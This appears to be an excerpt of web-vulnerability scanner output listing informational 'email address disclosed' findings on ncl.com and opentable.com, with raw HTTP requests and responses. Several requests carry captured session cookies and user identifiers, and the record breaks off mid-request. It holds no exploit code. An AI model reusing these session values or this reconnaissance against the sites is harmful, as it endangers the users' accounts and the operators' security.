Connection: keep-alive


//web/script/min/yui-functional-0.4.0-min.js

YAHOO.lang.augmentObject(YAHOO.namespace("YAHOO.util.Functional"),{each:function(j,g,f){var b=0;try{if(j.forEach){j.forEach(g,f)}else{if(j.length){for(va
...[SNIP]...
<dav.glass@yahoo.com>
...[SNIP]...
20.59. https://www.ncl.com/nclweb/script/min/effects-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/script/min/effects-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nclweb/script/min/effects-min.js HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 19 Aug 2011 05:15:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: application/x-javascript
Content-Length: 30501
Date: Mon, 03 Oct 2011 12:51:29 GMT
Connection: keep-alive

/*
* Copyright (c) 2007, Dav Glass <dav.glass@yahoo.com>.
* Code licensed under the BSD License:
* http://blog.davglass.com/license.txt
* All rights reserved.
*/
YAHOO.widget.Effects=function(){return
...[SNIP]...
20.60. http://www.opentable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+17%3a21%3a22&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5; pgseq=; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100f310a61d67e345889bdb2fb7; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; domain=.opentable.com; path=/
Set-Cookie: em=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Vary: Accept-Encoding
Content-Length: 54918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
20.61. http://www.opentable.com//info/restaurateurs/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:21 GMT

GIF89a.............!.......,...........D..;
20.62. http://www.opentable.com//info/restaurateurs/img/restjoinus/overview.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/restjoinus/overview.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/restjoinus/overview.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 18828
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:20 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
20.63. http://www.opentable.com//info/restaurateurs/img/restjoinus/whitedots_278.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/restjoinus/whitedots_278.gif

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/restjoinus/whitedots_278.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:22 GMT

GIF89a.......................................................................................................!.......,..........i.".d)Z.....$
"..Q.....`.......l8.....^.Y....~...(EV.X'1z.*.M..8MZ..!..=
...[SNIP]...
20.64. http://www.opentable.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /WebResource.axd

Issue detail

The following email address was disclosed in the response:

Request

GET /WebResource.axd?d=9MIXDm5qSekQJGh0ZMKoUBXqK1cTtQYEqPx-grAa4m7SLiJb1ZCChVIyrhawOT2OuVn_ebQiUDkVj7xQIiHA_ywQcGU1&t=634516341012771027 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public
Date: Mon, 03 Oct 2011 12:54:52 GMT
Content-Type: application/x-javascript
Expires: Tue, 02 Oct 2012 07:57:40 GMT
Last-Modified: Wed, 14 Sep 2011 23:53:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21547

var Page_ValidationVer = "125";
var Page_IsValid = true;
var Page_BlockSubmit = false;
var Page_InvalidControlToBeFocused = null;
function ValidatorUpdateDisplay(val) {
if (typeof(val.display
...[SNIP]...
20.65. http://www.opentable.com/adpanelcontent247.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /adpanelcontent247.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /adpanelcontent247.aspx?m=0&page=home_aspx&pagetype=HOME&adtype=FLOATINGFOOTER HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=; s_cc=true; s_nr=1317651719004-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 1527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="robots" cont
...[SNIP]...
20.66. http://www.opentable.com/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /blank.html

Issue detail

The following email address was disclosed in the response:

Request

GET /blank.html HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT

20.67. http://www.opentable.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3024000
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

............ .h.......(....... ..... .................................................................................................................................x...p...m...m...o...z.............
...[SNIP]...
20.68. http://www.opentable.com/frontdoor/css/ot_short.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/css/ot_short.css

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 4496
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:38 GMT

.ui-datepicker{font-family:verdana,arial,helvetica,sans-serif;font-size:10.6px!important;margin-left:-34px!important;}.ui-widget{width:157px;}.ui-datepicker td span,.ui-datepicker td a{display:block;p
...[SNIP]...
20.69. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...
20.70. http://www.opentable.com/frontdoor/img/downarrow_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/downarrow_gray.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/downarrow_gray.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 731
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:39 GMT

GIF89a........................................................................................7............................................8........YC,.........C*....8...........xfT..................B
...[SNIP]...
20.71. http://www.opentable.com/frontdoor/img/icons_final_dark.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/icons_final_dark.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/icons_final_dark.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
